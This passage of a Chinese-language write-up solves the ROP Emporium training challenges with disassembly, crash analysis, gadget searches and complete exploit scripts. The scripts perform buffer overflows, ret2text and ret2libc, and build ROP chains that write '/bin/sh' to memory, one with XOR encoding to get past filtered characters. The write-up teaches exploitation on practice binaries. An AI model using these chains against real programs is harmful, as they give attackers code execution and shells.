0x08048617 <+33>: call 0x8048420 <puts@plt>
0x0804861c <+38>: add esp,0x10
0x0804861f <+41>: sub esp,0xc
0x08048622 <+44>: push 0x80487bc
0x08048627 <+49>: call 0x8048420 <puts@plt>
0x0804862c <+54>: add esp,0x10
0x0804862f <+57>: sub esp,0xc
0x08048632 <+60>: push 0x8048821
0x08048637 <+65>: call 0x8048400 <printf@plt>
0x0804863c <+70>: add esp,0x10
0x0804863f <+73>: mov eax,ds:0x804a060
0x08048644 <+78>: sub esp,0x4
0x08048647 <+81>: push eax
0x08048648 <+82>: push 0x32
0x0804864a <+84>: lea eax,[ebp-0x28]
0x0804864d <+87>: push eax
0x0804864e <+88>: call 0x8048410 <fgets@plt>
0x08048653 <+93>: add esp,0x10
0x08048656 <+96>: nop
0x08048657 <+97>: leave
0x08048658 <+98>: ret
End of assembler dump.
gdb-peda$ disassemble ret2win
Dump of assembler code for function ret2win:
0x08048659 <+0>: push ebp
0x0804865a <+1>: mov ebp,esp
0x0804865c <+3>: sub esp,0x8
0x0804865f <+6>: sub esp,0xc
0x08048662 <+9>: push 0x8048824
0x08048667 <+14>: call 0x8048400 <printf@plt>
0x0804866c <+19>: add esp,0x10
0x0804866f <+22>: sub esp,0xc
0x08048672 <+25>: push 0x8048841
0x08048677 <+30>: call 0x8048430 <system@plt>
0x0804867c <+35>: add esp,0x10
0x0804867f <+38>: nop
0x08048680 <+39>: leave
0x08048681 <+40>: ret
End of assembler dump.
函数 pwnme()
是存在缓冲区溢出的函数,它调用 fgets()
读取任意数据,但缓冲区的大小只有 40 字节(0x0804864a <+84>: lea eax,[ebp-0x28]
,0x28=40),当输入大于 40 字节的数据时,就可以覆盖掉调用函数的 ebp 和返回地址:
gdb-peda$ pattern_create 50
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA'
gdb-peda$ r
Starting program: /home/firmy/Desktop/rop_emporium/ret2win32/ret2win32
ret2win by ROP Emporium
32bits
For my first trick, I will attempt to fit 50 bytes of user input into 32 bytes of stack buffer;
What could possibly go wrong?
You there madam, may I have your input please? And don't worry about null bytes, we're using fgets!
> AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xffffd5c0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAb")
EBX: 0x0
ECX: 0xffffd5c0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAb")
EDX: 0xf7f90860 --> 0x0
ESI: 0xf7f8ee28 --> 0x1d1d30
EDI: 0x0
EBP: 0x41304141 ('AA0A')
ESP: 0xffffd5f0 --> 0xf7f80062 --> 0x41000000 ('')
EIP: 0x41414641 ('AFAA')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41414641
[------------------------------------stack-------------------------------------]
0000| 0xffffd5f0 --> 0xf7f80062 --> 0x41000000 ('')
0004| 0xffffd5f4 --> 0xffffd610 --> 0x1
0008| 0xffffd5f8 --> 0x0
0012| 0xffffd5fc --> 0xf7dd57c3 (<__libc_start_main+243>: add esp,0x10)
0016| 0xffffd600 --> 0xf7f8ee28 --> 0x1d1d30
0020| 0xffffd604 --> 0xf7f8ee28 --> 0x1d1d30
0024| 0xffffd608 --> 0x0
0028| 0xffffd60c --> 0xf7dd57c3 (<__libc_start_main+243>: add esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41414641 in ?? ()
gdb-peda$ pattern_offset $ebp
1093681473 found at offset: 40
gdb-peda$ pattern_offset $eip
1094796865 found at offset: 44
缓冲区距离 ebp 和 eip 的偏移分别为 40 和 44,这就验证了我们的假设。
通过查看程序的逻辑,虽然我们知道 .text 段中存在函数 ret2win()
,但在程序执行中并没有调用到它,我们要做的就是用该函数的地址覆盖返回地址,使程序跳转到该函数中,从而打印出 flag,我们称这一类型的 ROP 为 ret2text。
还有一件重要的事情是 checksec:
gdb-peda$ checksec
CANARY : disabled
FORTIFY : disabled
NX : ENABLED
PIE : disabled
RELRO : Partial
这里开启了关闭了 PIE,所以 .text 的加载地址是不变的,可以直接使用 ret2win()
的地址 0x08048659
。
payload 如下(注这篇文章中的paylaod我会使用多种方法来写,以展示各种工具的使用):
$ python2 -c "print 'A'*44 + '\x59\x86\x04\x08'" | ./ret2win32
...
> Thank you! Here's your flag:ROPE{a_placeholder_32byte_flag!}
ret2win
现在是 64 位程序:
gdb-peda$ disassemble pwnme
Dump of assembler code for function pwnme:
0x00000000004007b5 <+0>: push rbp
0x00000000004007b6 <+1>: mov rbp,rsp
0x00000000004007b9 <+4>: sub rsp,0x20
0x00000000004007bd <+8>: lea rax,[rbp-0x20]
0x00000000004007c1 <+12>: mov edx,0x20
0x00000000004007c6 <+17>: mov esi,0x0
0x00000000004007cb <+22>: mov rdi,rax
0x00000000004007ce <+25>: call 0x400600 <memset@plt>
0x00000000004007d3 <+30>: mov edi,0x4008f8
0x00000000004007d8 <+35>: call 0x4005d0 <puts@plt>
0x00000000004007dd <+40>: mov edi,0x400978
0x00000000004007e2 <+45>: call 0x4005d0 <puts@plt>
0x00000000004007e7 <+50>: mov edi,0x4009dd
0x00000000004007ec <+55>: mov eax,0x0
0x00000000004007f1 <+60>: call 0x4005f0 <printf@plt>
0x00000000004007f6 <+65>: mov rdx,QWORD PTR [rip+0x200873] # 0x601070 <stdin@@GLIBC_2.2.5>
0x00000000004007fd <+72>: lea rax,[rbp-0x20]
0x0000000000400801 <+76>: mov esi,0x32
0x0000000000400806 <+81>: mov rdi,rax
0x0000000000400809 <+84>: call 0x400620 <fgets@plt>
0x000000000040080e <+89>: nop
0x000000000040080f <+90>: leave
0x0000000000400810 <+91>: ret
End of assembler dump.
gdb-peda$ disassemble ret2win
Dump of assembler code for function ret2win:
0x0000000000400811 <+0>: push rbp
0x0000000000400812 <+1>: mov rbp,rsp
0x0000000000400815 <+4>: mov edi,0x4009e0
0x000000000040081a <+9>: mov eax,0x0
0x000000000040081f <+14>: call 0x4005f0 <printf@plt>
0x0000000000400824 <+19>: mov edi,0x4009fd
0x0000000000400829 <+24>: call 0x4005e0 <system@plt>
0x000000000040082e <+29>: nop
0x000000000040082f <+30>: pop rbp
0x0000000000400830 <+31>: ret
End of assembler dump.
首先与 32 位不同的是参数传递,64 位程序的前六个参数通过 RDI、RSI、RDX、RCX、R8 和 R9 传递。所以缓冲区大小参数通过 rdi 传递给 fgets()
,大小为 32 字节。
而且由于 ret 的地址不存在,程序停在了 => 0x400810 <pwnme+91>: ret
这一步,这是因为 64 位可以使用的内存地址不能大于 0x00007fffffffffff
,否则就会抛出异常。
gdb-peda$ r
Starting program: /home/firmy/Desktop/rop_emporium/ret2win/ret2win
ret2win by ROP Emporium
64bits
For my first trick, I will attempt to fit 50 bytes of user input into 32 bytes of stack buffer;
What could possibly go wrong?
You there madam, may I have your input please? And don't worry about null bytes, we're using fgets!
> AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x7fffffffe400 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAb")
RBX: 0x0
RCX: 0x1f
RDX: 0x7ffff7dd4710 --> 0x0
RSI: 0x7fffffffe400 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAb")
RDI: 0x7fffffffe401 ("AA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAb")
RBP: 0x6141414541412941 ('A)AAEAAa')
RSP: 0x7fffffffe428 ("AA0AAFAAb")
RIP: 0x400810 (<pwnme+91>: ret)
R8 : 0x0
R9 : 0x7ffff7fb94c0 (0x00007ffff7fb94c0)
R10: 0x602260 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA\n")
R11: 0x246
R12: 0x400650 (<_start>: xor ebp,ebp)
R13: 0x7fffffffe510 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x400809 <pwnme+84>: call 0x400620 <fgets@plt>
0x40080e <pwnme+89>: nop
0x40080f <pwnme+90>: leave
=> 0x400810 <pwnme+91>: ret
0x400811 <ret2win>: push rbp
0x400812 <ret2win+1>: mov rbp,rsp
0x400815 <ret2win+4>: mov edi,0x4009e0
0x40081a <ret2win+9>: mov eax,0x0
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe428 ("AA0AAFAAb")
0008| 0x7fffffffe430 --> 0x400062 --> 0x1f8000000000000
0016| 0x7fffffffe438 --> 0x7ffff7a41f6a (<__libc_start_main+234>: mov edi,eax)
0024| 0x7fffffffe440 --> 0x0
0032| 0x7fffffffe448 --> 0x7fffffffe518 --> 0x7fffffffe870 ("/home/firmy/Desktop/rop_emporium/ret2win/ret2win")
0040| 0x7fffffffe450 --> 0x100000000
0048| 0x7fffffffe458 --> 0x400746 (<main>: push rbp)
0056| 0x7fffffffe460 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000000000400810 in pwnme ()
gdb-peda$ pattern_offset $rbp
7007954260868540737 found at offset: 32
gdb-peda$ pattern_offset AA0AAFAAb
AA0AAFAAb found at offset: 40
re2win()
的地址为 0x0000000000400811
,payload 如下:
from zio import *
payload = "A"*40 + l64(0x0000000000400811)
io = zio('./ret2win')
io.writeline(payload)
io.read()
split32
这一题也是 ret2text,但这一次,我们有的是一个 usefulFunction()
函数:
gdb-peda$ disassemble usefulFunction
Dump of assembler code for function usefulFunction:
0x08048649 <+0>: push ebp
0x0804864a <+1>: mov ebp,esp
0x0804864c <+3>: sub esp,0x8
0x0804864f <+6>: sub esp,0xc
0x08048652 <+9>: push 0x8048747
0x08048657 <+14>: call 0x8048430 <system@plt>
0x0804865c <+19>: add esp,0x10
0x0804865f <+22>: nop
0x08048660 <+23>: leave
0x08048661 <+24>: ret
End of assembler dump.
它调用 system()
函数,而我们要做的是给它传递一个参数,执行该参数后可以打印出 flag。
使用 radare2 中的工具 rabin2 在 .data
段中搜索字符串:
$ rabin2 -z split32
...
vaddr=0x0804a030 paddr=0x00001030 ordinal=000 sz=18 len=17 section=.data type=ascii string=/bin/cat flag.txt
我们发现存在字符串 /bin/cat flag.txt
,这正是我们需要的,地址为 0x0804a030
。
下面构造 payload,这里就有两种方法,一种是直接使用调用 system()
函数的地址 0x08048657
,另一种是使用 system()
的 plt 地址 0x8048430
,在前面的章节中我们已经知道了 plt 的延迟绑定机制(1.5.6动态链接),这里我们再回顾一下:
绑定前:
gdb-peda$ disassemble system
Dump of assembler code for function system@plt:
0x08048430 <+0>: jmp DWORD PTR ds:0x804a018
0x08048436 <+6>: push 0x18
0x0804843b <+11>: jmp 0x80483f0
gdb-peda$ x/5x 0x804a018
0x804a018: 0x08048436 0x08048446 0x08048456 0x08048466
0x804a028: 0x00000000
绑定后:
gdb-peda$ disassemble system
Dump of assembler code for function system:
0xf7df9c50 <+0>: sub esp,0xc
0xf7df9c53 <+3>: mov eax,DWORD PTR [esp+0x10]
0xf7df9c57 <+7>: call 0xf7ef32cd <__x86.get_pc_thunk.dx>
0xf7df9c5c <+12>: add edx,0x1951cc
0xf7df9c62 <+18>: test eax,eax
0xf7df9c64 <+20>: je 0xf7df9c70 <system+32>
0xf7df9c66 <+22>: add esp,0xc
0xf7df9c69 <+25>: jmp 0xf7df9700 <do_system>
0xf7df9c6e <+30>: xchg ax,ax
0xf7df9c70 <+32>: lea eax,[edx-0x57616]
0xf7df9c76 <+38>: call 0xf7df9700 <do_system>
0xf7df9c7b <+43>: test eax,eax
0xf7df9c7d <+45>: sete al
0xf7df9c80 <+48>: add esp,0xc
0xf7df9c83 <+51>: movzx eax,al
0xf7df9c86 <+54>: ret
End of assembler dump.
gdb-peda$ x/5x 0x08048430
0x8048430 <system@plt>: 0xa01825ff 0x18680804 0xe9000000 0xffffffb0
0x8048440 <__libc_start_main@plt>: 0xa01c25ff
其实这里讲 plt 不是很确切,因为 system 使用太频繁,在我们使用它之前,它就已经绑定了,在后面的挑战中我们会遇到没有绑定的情况。
两种 payload 如下:
$ python2 -c "print 'A'*44 + '\x57\x86\x04\x08' + '\x30\xa0\x04\x08'" | ./split32
...
> ROPE{a_placeholder_32byte_flag!}
from zio import *
payload = "A"*44
payload += l32(0x08048430)
payload += "BBBB"
payload += l32(0x0804a030)
io = zio('./split32')
io.writeline(payload)
io.read()
注意 "BBBB" 是新的返回地址,如果函数 ret,就会执行 "BBBB" 处的指令,通常这里会放置一些 pop;pop;ret
之类的指令地址,以平衡堆栈。从 system() 函数中也能看出来,它现将 esp 减去 0xc,再取地址 esp+0x10 处的指令,也就是 "BBBB" 的后一个,即字符串的地址。因为 system()
是 libc 中的函数,所以这种方法称作 ret2libc。
split
$ rabin2 -z split
...
vaddr=0x00601060 paddr=0x00001060 ordinal=000 sz=18 len=17 section=.data type=ascii string=/bin/cat flag.txt
字符串地址在 0x00601060
。
gdb-peda$ disassemble usefulFunction
Dump of assembler code for function usefulFunction:
0x0000000000400807 <+0>: push rbp
0x0000000000400808 <+1>: mov rbp,rsp
0x000000000040080b <+4>: mov edi,0x4008ff
0x0000000000400810 <+9>: call 0x4005e0 <system@plt>
0x0000000000400815 <+14>: nop
0x0000000000400816 <+15>: pop rbp
0x0000000000400817 <+16>: ret
End of assembler dump.
64 位程序的第一个参数通过 edi 传递,所以我们需要再调用一个 gadgets 来将字符串的地址存进 edi。
我们先找到需要的 gadgets:
gdb-peda$ ropsearch "pop rdi; ret"
Searching for ROP gadget: 'pop rdi; ret' in: binary ranges
0x00400883 : (b'5fc3') pop rdi; ret
下面是 payload:
$ python2 -c "print 'A'*40 + '\x83\x08\x40\x00\x00\x00\x00\x00' + '\x60\x10\x60\x00\x00\x00\x00\x00' + '\x10\x08\x40\x00\x00\x00\x00\x00'" | ./split
...
> ROPE{a_placeholder_32byte_flag!}
那我们是否还可以用前面那种方法调用 system()
的 plt 地址 0x4005e0
呢:
gdb-peda$ disassemble system
Dump of assembler code for function system:
0x00007ffff7a63010 <+0>: test rdi,rdi
0x00007ffff7a63013 <+3>: je 0x7ffff7a63020 <system+16>
0x00007ffff7a63015 <+5>: jmp 0x7ffff7a62a70 <do_system>
0x00007ffff7a6301a <+10>: nop WORD PTR [rax+rax*1+0x0]
0x00007ffff7a63020 <+16>: lea rdi,[rip+0x138fd6] # 0x7ffff7b9bffd
0x00007ffff7a63027 <+23>: sub rsp,0x8
0x00007ffff7a6302b <+27>: call 0x7ffff7a62a70 <do_system>
0x00007ffff7a63030 <+32>: test eax,eax
0x00007ffff7a63032 <+34>: sete al
0x00007ffff7a63035 <+37>: add rsp,0x8
0x00007ffff7a63039 <+41>: movzx eax,al
0x00007ffff7a6303c <+44>: ret
End of assembler dump.
依然可以,因为参数的传递没有用到栈,我们只需把地址直接更改就可以了:
from zio import *
payload = "A"*40
payload += l64(0x00400883)
payload += l64(0x00601060)
payload += l64(0x4005e0)
io = zio('./split')
io.writeline(payload)
io.read()
callme32
这里我们要接触真正的 plt 了,根据题目提示,callme32 从共享库 libcallme32.so 中导入三个特殊的函数:
$ rabin2 -i callme32 | grep callme
ordinal=004 plt=0x080485b0 bind=GLOBAL type=FUNC name=callme_three
ordinal=005 plt=0x080485c0 bind=GLOBAL type=FUNC name=callme_one
ordinal=012 plt=0x08048620 bind=GLOBAL type=FUNC name=callme_two
我们要做的是依次调用 callme_one()
、callme_two()
和 callme_three()
,并且每个函数都要传入参数 1
、2
、3
。通过调试我们能够知道函数逻辑,callme_one
用于读入加密后的 flag,然后依次调用 callme_two
和 callme_three
进行解密。
由于函数参数是放在栈上的,为了平衡堆栈,我们需要一个 pop;pop;pop;ret
的 gadgets:
$ objdump -d callme32 | grep -A 3 pop
...
80488a8: 5b pop %ebx
80488a9: 5e pop %esi
80488aa: 5f pop %edi
80488ab: 5d pop %ebp
80488ac: c3 ret
80488ad: 8d 76 00 lea 0x0(%esi),%esi
...
或者是 add esp, 8; pop; ret
,反正只要能平衡,都可以:
gdb-peda$ ropsearch "add esp, 8"
Searching for ROP gadget: 'add esp, 8' in: binary ranges
0x08048576 : (b'83c4085bc3') add esp,0x8; pop ebx; ret
0x080488c3 : (b'83c4085bc3') add esp,0x8; pop ebx; ret
构造 payload 如下:
from zio import *
payload = "A"*44
payload += l32(0x080485c0)
payload += l32(0x080488a9)
payload += l32(0x1) + l32(0x2) + l32(0x3)
payload += l32(0x08048620)
payload += l32(0x080488a9)
payload += l32(0x1) + l32(0x2) + l32(0x3)
payload += l32(0x080485b0)
payload += l32(0x080488a9)
payload += l32(0x1) + l32(0x2) + l32(0x3)
io = zio('./callme32')
io.writeline(payload)
io.read()
callme
64 位程序不需要平衡堆栈了,只要将参数按顺序依次放进寄存器中就可以了。
$ rabin2 -i callme | grep callme
ordinal=004 plt=0x00401810 bind=GLOBAL type=FUNC name=callme_three
ordinal=008 plt=0x00401850 bind=GLOBAL type=FUNC name=callme_one
ordinal=011 plt=0x00401870 bind=GLOBAL type=FUNC name=callme_two
gdb-peda$ ropsearch "pop rdi; pop rsi"
Searching for ROP gadget: 'pop rdi; pop rsi' in: binary ranges
0x00401ab0 : (b'5f5e5ac3') pop rdi; pop rsi; pop rdx; ret
payload 如下:
from zio import *
payload = "A"*40
payload += l64(0x00401ab0)
payload += l64(0x1) + l64(0x2) + l64(0x3)
payload += l64(0x00401850)
payload += l64(0x00401ab0)
payload += l64(0x1) + l64(0x2) + l64(0x3)
payload += l64(0x00401870)
payload += l64(0x00401ab0)
payload += l64(0x1) + l64(0x2) + l64(0x3)
payload += l64(0x00401810)
io = zio('./callme')
io.writeline(payload)
io.read()
write432
这一次,我们已经不能在程序中找到可以执行的语句了,但我们可以利用 gadgets 将 /bin/sh
写入到目标进程的虚拟内存空间中,如 .data
段中,再调用 system() 执行它,从而拿到 shell。要认识到一个重要的点是,ROP 只是一种任意代码执行的形式,只要我们有创意,就可以利用它来执行诸如内存读写等操作。
这种方法虽然好用,但还是要考虑我们写入地址的读写和执行权限,以及它能提供的空间是多少,我们写入的内容是否会影响到程序执行等问题。如我们接下来想把字符串写入 .data
段,我们看一下它的权限和大小等信息:
$ readelf -S write432
[Nr] Name Type Addr Off Size ES Flg Lk Inf Al
...
[16] .rodata PROGBITS 080486f8 0006f8 000064 00 A 0 0 4
[25] .data PROGBITS 0804a028 001028 000008 00 WA 0 0 4
可以看到 .data
具有 WA
,即写入(write)和分配(alloc)的权利,而 .rodata
就不能写入。
使用工具 ropgadget 可以很方便地找到我们需要的 gadgets:
$ ropgadget --binary write432 --only "mov|pop|ret"
...
0x08048670 : mov dword ptr [edi], ebp ; ret
0x080486da : pop edi ; pop ebp ; ret
另外需要注意的是,我们这里是 32 位程序,每次只能写入 4 个字节,所以要分成两次写入,还得注意字符对齐,有没有截断字符(\x00
,\x0a
等)之类的问题,比如这里 /bin/sh
只有七个字节,我们可以使用 /bin/sh\00
或者 /bin//sh
,构造 payload 如下:
from zio import *
pop_edi_ebp = 0x080486da
mov_edi_ebp = 0x08048670
data_addr = 0x804a028
system_plt = 0x8048430
payload = ""
payload += "A"*44
payload += l32(pop_edi_ebp)
payload += l32(data_addr)
payload += "/bin"
payload += l32(mov_edi_ebp)
payload += l32(pop_edi_ebp)
payload += l32(data_addr+4)
payload += "/sh\x00"
payload += l32(mov_edi_ebp)
payload += l32(system_plt)
payload += "BBBB"
payload += l32(data_addr)
io = zio('./write432')
io.writeline(payload)
io.interact()
$ python2 run.py
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(/binp,/shp0BBBB(�
write4 by ROP Emporium
32bits
Go ahead and give me the string already!
> cat flag.txt
ROPE{a_placeholder_32byte_flag!}
write4
64 位程序就可以一次性写入了。
$ ropgadget --binary write4 --only "mov|pop|ret"
...
0x0000000000400820 : mov qword ptr [r14], r15 ; ret
0x0000000000400890 : pop r14 ; pop r15 ; ret
0x0000000000400893 : pop rdi ; ret
from pwn import *
pop_r14_r15 = 0x0000000000400890
mov_r14_r15 = 0x0000000000400820
pop_rdi = 0x0000000000400893
data_addr = 0x0000000000601050
system_plt = 0x004005e0
payload = "A"*40
payload += p64(pop_r14_r15)
payload += p64(data_addr)
payload += "/bin/sh\x00"
payload += p64(mov_r14_r15)
payload += p64(pop_rdi)
payload += p64(data_addr)
payload += p64(system_plt)
io = process('./write4')
io.recvuntil('>')
io.sendline(payload)
io.interactive()
badchars32
在这个挑战中,我们依然要将 /bin/sh
写入到进程内存中,但这一次程序在读取输入时会对敏感字符进行检查,查看函数 checkBadchars()
:
gdb-peda$ disassemble checkBadchars
Dump of assembler code for function checkBadchars:
0x08048801 <+0>: push ebp
0x08048802 <+1>: mov ebp,esp
0x08048804 <+3>: sub esp,0x10
0x08048807 <+6>: mov BYTE PTR [ebp-0x10],0x62
0x0804880b <+10>: mov BYTE PTR [ebp-0xf],0x69
0x0804880f <+14>: mov BYTE PTR [ebp-0xe],0x63
0x08048813 <+18>: mov BYTE PTR [ebp-0xd],0x2f
0x08048817 <+22>: mov BYTE PTR [ebp-0xc],0x20
0x0804881b <+26>: mov BYTE PTR [ebp-0xb],0x66
0x0804881f <+30>: mov BYTE PTR [ebp-0xa],0x6e
0x08048823 <+34>: mov BYTE PTR [ebp-0x9],0x73
0x08048827 <+38>: mov DWORD PTR [ebp-0x4],0x0
0x0804882e <+45>: mov DWORD PTR [ebp-0x8],0x0
0x08048835 <+52>: mov DWORD PTR [ebp-0x4],0x0
0x0804883c <+59>: jmp 0x804887c <checkBadchars+123>
0x0804883e <+61>: mov DWORD PTR [ebp-0x8],0x0
0x08048845 <+68>: jmp 0x8048872 <checkBadchars+113>
0x08048847 <+70>: mov edx,DWORD PTR [ebp+0x8]
0x0804884a <+73>: mov eax,DWORD PTR [ebp-0x4]
0x0804884d <+76>: add eax,edx
0x0804884f <+78>: movzx edx,BYTE PTR [eax]
0x08048852 <+81>: lea ecx,[ebp-0x10]
0x08048855 <+84>: mov eax,DWORD PTR [ebp-0x8]
0x08048858 <+87>: add eax,ecx
0x0804885a <+89>: movzx eax,BYTE PTR [eax]
0x0804885d <+92>: cmp dl,al
0x0804885f <+94>: jne 0x804886e <checkBadchars+109>
0x08048861 <+96>: mov edx,DWORD PTR [ebp+0x8]
0x08048864 <+99>: mov eax,DWORD PTR [ebp-0x4]
0x08048867 <+102>: add eax,edx
0x08048869 <+104>: mov BYTE PTR [eax],0xeb
0x0804886c <+107>: jmp 0x8048878 <checkBadchars+119>
0x0804886e <+109>: add DWORD PTR [ebp-0x8],0x1
0x08048872 <+113>: cmp DWORD PTR [ebp-0x8],0x7
0x08048876 <+117>: jbe 0x8048847 <checkBadchars+70>
0x08048878 <+119>: add DWORD PTR [ebp-0x4],0x1
0x0804887c <+123>: mov eax,DWORD PTR [ebp-0x4]
0x0804887f <+126>: cmp eax,DWORD PTR [ebp+0xc]
0x08048882 <+129>: jb 0x804883e <checkBadchars+61>
0x08048884 <+131>: nop
0x08048885 <+132>: leave
0x08048886 <+133>: ret
End of assembler dump.
很明显,地址 0x08048807
到 0x08048823
的字符就是所谓的敏感字符。处理敏感字符在利用开发中是经常要用到的,不仅仅是要对参数进行编码,有时甚至地址也要如此。这里我们使用简单的异或操作来对字符串编码和解码。
找到 gadgets:
$ ropgadget --binary badchars32 --only "mov|pop|ret|xor"
...
0x08048893 : mov dword ptr [edi], esi ; ret
0x08048896 : pop ebx ; pop ecx ; ret
0x08048899 : pop esi ; pop edi ; ret
0x08048890 : xor byte ptr [ebx], cl ; ret
整个利用过程就是写入前编码,使用前解码,下面是 payload:
from zio import *
xor_ebx_cl = 0x08048890
pop_ebx_ecx = 0x08048896
pop_esi_edi = 0x08048899
mov_edi_esi = 0x08048893
system_plt = 0x080484e0
data_addr = 0x0804a038
# encode
badchars = [0x62, 0x69, 0x63, 0x2f, 0x20, 0x66, 0x6e, 0x73]
xor_byte = 0x1
while(1):
binsh = ""
for i in "/bin/sh\x00":
c = ord(i) ^ xor_byte
if c in badchars:
xor_byte += 1
break
else:
binsh += chr(c)
if len(binsh) == 8:
break
# write
payload = "A"*44
payload += l32(pop_esi_edi)
payload += binsh[:4]
payload += l32(data_addr)
payload += l32(mov_edi_esi)
payload += l32(pop_esi_edi)
payload += binsh[4:8]
payload += l32(data_addr + 4)
payload += l32(mov_edi_esi)
# decode
for i in range(len(binsh)):
payload += l32(pop_ebx_ecx)
payload += l32(data_addr + i)
payload += l32(xor_byte)
payload += l32(xor_ebx_cl)
# run
payload += l32(system_plt)
payload += "BBBB"
payload += l32(data_addr)
io = zio('./badchars32')
io.writeline(payload)
io.interact()
badchars
64 位程序也是一样的,注意参数传递就好了。
$ ropgadget --binary badchars --only "mov|pop|ret|xor"
...
0x0000000000400b34 : mov qword ptr [r13], r12 ; ret
0x0000000000400b3b : pop r12 ; pop r13 ; ret
0x0000000000400b40 : pop r14 ; pop r15 ; ret
0x0000000000400b30 : xor byte ptr [r15], r14b ; ret
0x0000000000400b39 : pop rdi ; ret
from pwn import *
pop_r12_r13 = 0x0000000000400b3b
mov_r13_r12 = 0x0000000000400b34
pop_r14_r15 = 0x0000000000400b40
xor_r15_r14b = 0x0000000000400b30
pop_rdi = 0x0000000000400b39
system_plt = 0x00000000004006f0
data_addr = 0x0000000000601000
badchars = [0x62, 0x69, 0x63, 0x2f, 0x20, 0x66, 0x6e, 0x73]
xor_byte = 0x1
while(1):
binsh = ""
for i in "/bin/sh\x00":
c = ord(i) ^ xor_byte
if c in badchars:
xor_byte += 1
break
else:
binsh += chr(c)
if len(binsh) == 8:
break
payload = "A"*40
payload += p64(pop_r12_r13)
payload += binsh
payload += p64(data_addr)
payload += p64(mov_r13_r12)
for i in range(len(binsh)):
payload += p64(pop_r14_r15)
payload += p64(xor_byte)
payload += p64(data_addr + i)
payload += p64(xor_r15_r14b)
payload += p64(pop_rdi)
payload += p64(data_addr)
payload += p64(system_plt)
io = process('./badchars')
io.recvuntil('>')
io.sendline(payload)
io.interactive()
fluff32
这个练习与上面没有太大区别,难点在于我们能找到的 gadgets 不是那么直接,有一个技巧是因为我们的目的是写入字符串,那么必然需要 mov [reg], reg
这样的 gadgets,我们就从这里出发,倒推所需的 gadgets。
$ ropgadget --binary fluff32 --only "mov|pop|ret|xor|xchg"
...
0x08048693 : mov dword ptr [ecx], edx ; pop ebp ; pop ebx ; xor byte ptr [ecx], bl ; ret
0x080483e1 : pop ebx ; ret
0x08048689 : xchg edx, ecx ; pop ebp ; mov edx, 0xdefaced0 ; ret
0x0804867b : xor edx, ebx ; pop ebp ; mov edi, 0xdeadbabe ; ret
0x08048671 : xor edx, edx ; pop esi ; mov ebp, 0xcafebabe ; ret
我们看到一个这样的 mov dword ptr [ecx], edx ;
,可以想到我们将地址放进 ecx
,将数据放进 edx
,从而将数据写入到地址中。payload 如下:
from zio import *
system_plt = 0x08048430
data_addr = 0x0804a028
pop_ebx = 0x080483e1
mov_ecx_edx = 0x08048693
xchg_edx_ecx = 0x08048689
xor_edx_ebx = 0x0804867b
xor_edx_edx = 0x08048671
def write_data(data, addr):
# addr -> ecx
payload = l32(xor_edx_edx)
payload += "BBBB"
payload += l32(pop_ebx)
payload += l32(addr)
payload += l32(xor_edx_ebx)
payload += "BBBB"
payload += l32(xchg_edx_ecx)
payload += "BBBB"
# data -> edx
payload += l32(xor_edx_edx)
payload += "BBBB"
payload += l32(pop_ebx)
payload += data
payload += l32(xor_edx_ebx)
payload += "BBBB"
# edx -> [ecx]
payload += l32(mov_ecx_edx)
payload += "BBBB"
payload += l32(0)
return payload
payload = "A"*44
payload += write_data("/bin", data_addr)
payload += write_data("/sh\x00", data_addr + 4)
payload += l32(system_plt)
payload += "BBBB"
payload += l32(data_addr)
io = zio('./fluff32')
io.writeline(payload)
io.interact()
fluff
提示:在使用 ropgadget 搜索时加上参数 --depth
可以得到更大长度的 gadgets。
$ ropgadget --binary fluff --only "mov|pop|ret|xor|xchg" --depth 20
...
0x0000000000400832 : pop r12 ; mov r13d, 0x604060 ; ret
0x000000000040084c : pop r15 ; mov qword ptr [r10], r11 ; pop r13 ; pop r12 ; xor byte ptr [r10], r12b ; ret
0x0000000000400840 : xchg r11, r10 ; pop r15 ; mov r11d, 0x602050 ; ret
0x0000000000400822 : xor r11, r11 ; pop r14 ; mov edi, 0x601050 ; ret
0x000000000040082f : xor r11, r12 ; pop r12 ; mov r13d, 0x604060 ; ret
from pwn import *
system_plt = 0x004005e0
data_addr = 0x0000000000601050
xor_r11_r11 = 0x0000000000400822
xor_r11_r12 = 0x000000000040082f
xchg_r11_r10 = 0x0000000000400840
mov_r10_r11 = 0x000000000040084c
pop_r12 = 0x0000000000400832
def write_data(data, addr):
# addr -> r10
payload = p64(xor_r11_r11)
payload += "BBBBBBBB"
payload += p64(pop_r12)
payload += p64(addr)
payload += p64(xor_r11_r12)
payload += "BBBBBBBB"
payload += p64(xchg_r11_r10)
payload += "BBBBBBBB"
# data -> r11
payload += p64(xor_r11_r11)
payload += "BBBBBBBB"
payload += p64(pop_r12)
payload += data
payload += p64(xor_r11_r12)
payload += "BBBBBBBB"
# r11 -> [r10]
payload += p64(mov_r10_r11)
payload += "BBBBBBBB"*2
payload += p64(0)
return payload
payload = "A"*40
payload += write_data("/bin/sh\x00", data_addr)
payload += p64(system_plt)
